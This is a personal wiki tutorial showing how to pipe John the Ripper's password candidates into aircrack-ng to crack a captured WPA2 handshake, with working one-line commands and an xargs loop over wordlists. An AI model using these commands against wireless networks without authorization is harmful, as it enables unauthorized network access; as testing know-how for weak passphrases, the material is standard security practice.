Aircrack and John the Ripper

From charlesreid1

Revision as of 06:38, 1 August 2015 by Admin (talk | contribs)

What is Aircrack

We have met Aircrack before - it's a tool used for sniffing out the right WEP and WPA packets to crack the network's encryption. One of the last steps, once you've captured the proper packets, is to brute-force guess the WPA passphrase. This is where John can help.

What is John

John the Ripper is a tool for guessing weak passwords on user accounts. It's good at generating a whole bunch of random passwords that are based on words, or modifications of words, or numbers.

You can use John in conjunction with Aircrack, by telling John to just print out all of the words it has generated to stdout, and then using stdout as the aircrack wordlist/dictionary. This allows you to just let John crank away. There are certainly better ways to do it, but this can be a quick check for weak passwords.

Getting Set Up

To use Aircrack with John, you'll need to make sure you have both installed. If you're on Kali you're good to go.

John Modes

You can use John in multiple different modes, and depending on the mode, you'll either be waiting a few minutes, or a few years. Choose wisely.

Incremental All Mode (Exhaustive)

If you call John with the --incremental=allflag, that specifies incremental mode, which will go through every single painstaking combination. This means we don't have to supply a wordlist, but it also means we're going to be coming up with a lot of garbage guesses.

Specifying a Wordlist

If you want to specify a wordlist for John to use (like one of the many fantastic password lists in this Github repo: https://github.com/danielmiessler/SecLists), you can do so with the -w flag: 

-w=password.lst


John-Aircrack Command

There is no "final" John-to-Aircrack command, at least not until the passphrase is cracked.

The first one I tried looked like this: 

$ john -w=10_million_password_list_top_1000.txt --session=attack1 --stdout | aircrack-ng -a 2 -e ASDF asdf-01.cap -w -

Let's go through this one bit at a time:



--session=attack1: this tells John to keep track of where it is at in the process and what passwords it has guessed, which will make it possible to restore the session in case the process dies or is interrupted.

--stdout: print all words that John would have otherwise tried itself to stdout, so that some other program can use them

-a 2: this specifies the encryption protocol as WPA2

-e ASDF: this is the name of the wireless network whose WPA passphrase we're trying to crack

asdf-01.cap: this is the capture file from our earlier-run airomon-ng command.

-w -: the -w flag specifies a wordlist. Since, in this case, - by itself represents stdin (what John is piping in), this means we're using John's generated words as an aircrack wordlist.

Using Multiple Wordlists with John the Ripper

You can combine xargs with John to use one wordlist at a time: 

$ ls ~/wordlists/*.txt | xargs -t -I% john --session=attack1 --wordlist=%    [etc..... ]

So to put it all together: we will issue a one-line command. It will iterate through each wordlist in a given directory. For each wordlist, it will run John with that wordlist, and John will print a variety of words to try based on that wordlist. That output is then piped to Aircrack. 

$ ls ~/wordlists/*.txt | xargs -t -I% john --session=attack1 --wordlist=%  --stdout | aircrack-ng -a 2 -e ASDF asdf-01.cap -w -
Retrieved from "https://charlesreid1.com/w/index.php?title=Aircrack_and_John_the_Ripper&oldid=7477"